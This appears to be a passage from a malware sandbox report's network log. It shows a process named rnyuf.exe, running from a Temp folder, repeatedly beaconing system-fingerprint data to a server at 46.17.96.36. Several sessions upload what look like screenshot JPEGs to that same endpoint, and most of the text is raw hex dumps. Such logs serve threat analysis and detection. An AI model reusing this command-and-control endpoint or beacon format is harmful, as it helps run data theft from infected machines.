                                        Aug 29, 2021 22:29:02.003964901 CEST17744OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:02.036786079 CEST17747OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:02.036823034 CEST17755OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:29:02.137404919 CEST17814INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        293192.168.2.45003246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:02.216598034 CEST17814OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:02.287879944 CEST17815INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        294192.168.2.45003346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:02.523885965 CEST17816OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:02.523971081 CEST17816OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:02.524322033 CEST17826OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:02.524432898 CEST17829OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:02.557153940 CEST17832OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:02.557193041 CEST17834OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:02.557228088 CEST17837OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:29:02.557416916 CEST17848OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:02.557534933 CEST17849OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:29:02.557584047 CEST17854OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:02.590368032 CEST17857OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:02.709378004 CEST17924INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        295192.168.2.45003446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:02.525418997 CEST17829OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:02.595360041 CEST17905INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        296192.168.2.45003546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:02.801573992 CEST17925OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:02.874840975 CEST17926INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        297192.168.2.45003646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:03.123279095 CEST17926OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:03.123385906 CEST17927OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:03.123567104 CEST17937OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:03.123677015 CEST17939OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:03.158473969 CEST17943OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:03.158605099 CEST17945OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:03.158647060 CEST17953OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:29:03.158691883 CEST17960OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:29:03.158904076 CEST17965OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:03.194554090 CEST17968OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:03.194659948 CEST17976OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:29:03.304038048 CEST18035INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        298192.168.2.45003746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:03.142312050 CEST17940OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:03.214739084 CEST18016INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        299192.168.2.45003846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:03.528788090 CEST18036OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:03.602905035 CEST18036INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:29:03.875397921 CEST18036OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:03.875494957 CEST18036OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:03.875657082 CEST18046OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:03.876230955 CEST18049OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:03.909210920 CEST18057OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:03.909269094 CEST18065OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:03.909281015 CEST18070OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:29:03.909287930 CEST18076OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
